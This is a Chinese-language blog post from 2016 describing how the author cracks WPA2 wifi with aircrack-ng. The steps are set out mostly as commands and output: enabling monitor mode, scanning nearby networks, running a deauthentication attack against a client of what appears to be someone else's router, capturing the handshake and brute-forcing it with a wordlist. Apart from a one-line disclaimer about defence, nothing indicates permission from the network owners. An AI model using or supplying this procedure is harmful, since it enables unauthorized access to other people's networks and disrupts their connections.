像电影里的黑客那样破解wifi

0x00 前言

wifi破解工具有很多,比如wifite、aircrack、cowpatty、reaver等等,其中wifite是最傻瓜式的,但是个人尝试很久,没有破解成功一次,我就很好奇,是我的方式不对?cowpatty只管破解,因此还是要和air结合起来用。reaver破解的非常非常慢,一次要很久,但是一般都能搞定。这次先用aircrack。

0x01 准备

装x要用全套的,特意买的3070的网卡,专用破解。

据说效果很好,但是我完全体会不到......

~$ lsusb
Bus 001 Device 014: ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter

~$ iwconfig
wlan1     IEEE 802.11bgn  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=30 dBm
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:on

0x02 获取握手包

1.激活监听模式

~$ airmon-ng start wlan1

PHY     Interface       Driver          Chipset
phy1    wlan1           rt2800usb       Ralink Technology, Corp. RT2870/RT3070

                (mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
                (mac80211 station mode vif disabled for [phy1]wlan1)
                (mac80211 station mode vif disabled for [phy1]wlan1)

激活之后就发现名称变了,多了个mon,后面的mode是monitor。

~$ /home/dante# iwconfig

wlan1mon  IEEE 802.11bgn  Mode:Monitor  Tx-Power=30 dBm
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Power Management:on

2. 获取wifi信息

airodump-ng wlan0mon
下面就会显示出所有的wifi的链接信息。之前遗漏了这一块,暂时不补了。

3.抓包

破解的过程就是先抓包,抓到它的四次握手包,然后破解出密码。

airodump-ng --ivs -w filename -c wlan1mon
  BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                    
 5C:63:BF:61:8B:C8  -58      639      761    0   6  54e. WPA2 CCMP   PSK  quan
 30:F3:35:87:24:BC  -66      330        0    0   4  54e  WPA2 CCMP   PSK  CU_57w8
 C0:61:18:22:8B:2B  -65      620      547    0   6  54e. WPA2 CCMP   PSK  tunshi6
 64:09:80:4B:FC:2C  -71      223     2184    1   1  54e  WPA2 CCMP   PSK  Xiaomi_tunshi7
 ......
                                                                                                                                                     
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe
                                                                                                                                                     
 5C:63:BF:61:8B:C8  A4:C4:94:DB:10:1A  -44    0 - 2e     0      153  quan
 C0:61:18:22:8B:2B  74:2F:68:4A:7B:7B  -84    0e- 1      0      558  tunshi6
 64:09:80:4B:FC:2C  AC:B5:7D:D1:00:62   -1    1e- 0      0      154
 64:09:80:4B:FC:2C  14:F6:5A:B6:E2:94  -80    1e- 1      0     1369  su8-1
 ......

4.Deauth攻击

现在对脸上路由器64:09:80:4B:FC:2C上的设备64:09:80:4B:FC:2C进行攻击。

~$ aireplay-ng -0 10 -a 64:09:80:4B:FC:2C -c 64:09:80:4B:FC:2C4 wlan1mon --ignore-negative-one
13:18:29  Waiting for beacon frame (BSSID: 64:09:80:4B:FC:2C) on channel -1
13:18:30  Sending 64 directed DeAuth. STMAC: [14:F6:5A:B6:E2:94] [ 0| 0 ACKs]
13:18:30  Sending 64 directed DeAuth. STMAC: [14:F6:5A:B6:E2:94] [ 0| 0 ACKs]
13:18:30  Sending 64 directed DeAuth. STMAC: [14:F6:5A:B6:E2:94] [ 0| 0 ACKs]
13:18:31  Sending 64 directed DeAuth. STMAC: [14:F6:5A:B6:E2:94] [ 0| 0 ACKs]
13:18:31  Sending 64 directed DeAuth. STMAC: [14:F6:5A:B6:E2:94] [ 0| 0 ACKs]
13:18:32  Sending 64 directed DeAuth. STMAC: [14:F6:5A:B6:E2:94] [ 0| 0 ACKs]

可以看到,当发送攻击的时候,你攻击的那台设备就会丢包。

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe
 C0:61:18:22:8B:2B  74:2F:68:4A:7B:7B  -86    0e- 1      0      834  tunshi6
 64:09:80:4B:FC:2C  14:F6:5A:B6:E2:94    0    0e- 1    373     3782  su8-1

发送了好几次攻击,过了二十多分钟才获取到握手包。可以看到下面获取到了handshake

  CH  4 ][ Elapsed: 25 mins ][ 2016-03-06 13:34 ][ WPA handshake: 64:09:80:4B:FC:2C
                                                                                                                                                    
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                    
 5C:63:BF:61:8B:C8  -58     1973      909    0   6  54e. WPA2 CCMP   PSK  quan
 30:F3:35:87:24:BC  -64     1062        0    0   4  54e  WPA2 CCMP   PSK  CU_57w8
 64:09:80:4B:FC:2C  -73      707     4411    0   1  54e  WPA2 CCMP   PSK  Xiaomi_tunshi7
 ......

0x03 破解

破解就是用了爆破,完全是看字典!

aircrack-ng -w dic.txt test-0*.cap

然后选定需要破解的wifi即可开始进行破解。话说,运气不好的时候,打死也破解不出来.......

                           Aircrack-ng 1.2 rc3


                   [00:00:31] 12552 keys tested (381.79 k/s)


                       Current passphrase: 123bandit


      Master Key     : E3 A0 4F 08 DC D9 95 A5 87 48 02 B5 E1 93 C6 84
                       75 DD 23 E8 45 65 DD CA B8 89 53 96 75 E8 56 10

      Transient Key  : 11 24 33 3A FE 8F 51 E6 7D 7C C5 C2 BB 9B 0B 6F
                       4F 99 8C 5D 67 2B E2 6A 9C 34 2A 4A FB 1D 19 4F
                       84 C4 4C 8D 58 3B 22 70 C9 36 FD 98 D9 D6 E6 94
                       72 C9 AF 54 E1 B2 83 F1 EF 2A FA 0C 7D 59 3A 96

      EAPOL HMAC     : 80 84 40 03 84 DC E4 20 41 FF 74 C8 FB 1C DE EB

0xFF 总结

aircrack的确是神器,用好了破解个wifi不是太大问题的,不过也就弱密码比较好搞定一些,有些意识比较强的孩子密码设置的比较神奇,基本也没戏。

不过破解的方式也总是在提高,比如彩虹表、GPU这些各种高效的方式都可以使用,目前爆破能拿来玩一玩,剩余的慢慢研究。

补充

其实到头来都是在用工具,对里面的原理还没有太深的理解,下一步多了解一些使用方式后,着重自己动手写一些程序来操作。

注意: 学会技术不是用来做坏事的,而是让你知道该如何防备它们。


2016-03-06 19:18:00 hnds


作者:dantezhao | | CSDN | GITHUB

文章地址:http://www.jianshu.com/p/3fd42d9ef55d
个人主页:http://www.jianshu.com/u/2453cf172ab4
文章可以转载, 但必须以超链接形式标明文章原始出处和作者信息

你可能感兴趣的:(像电影里的黑客那样破解wifi)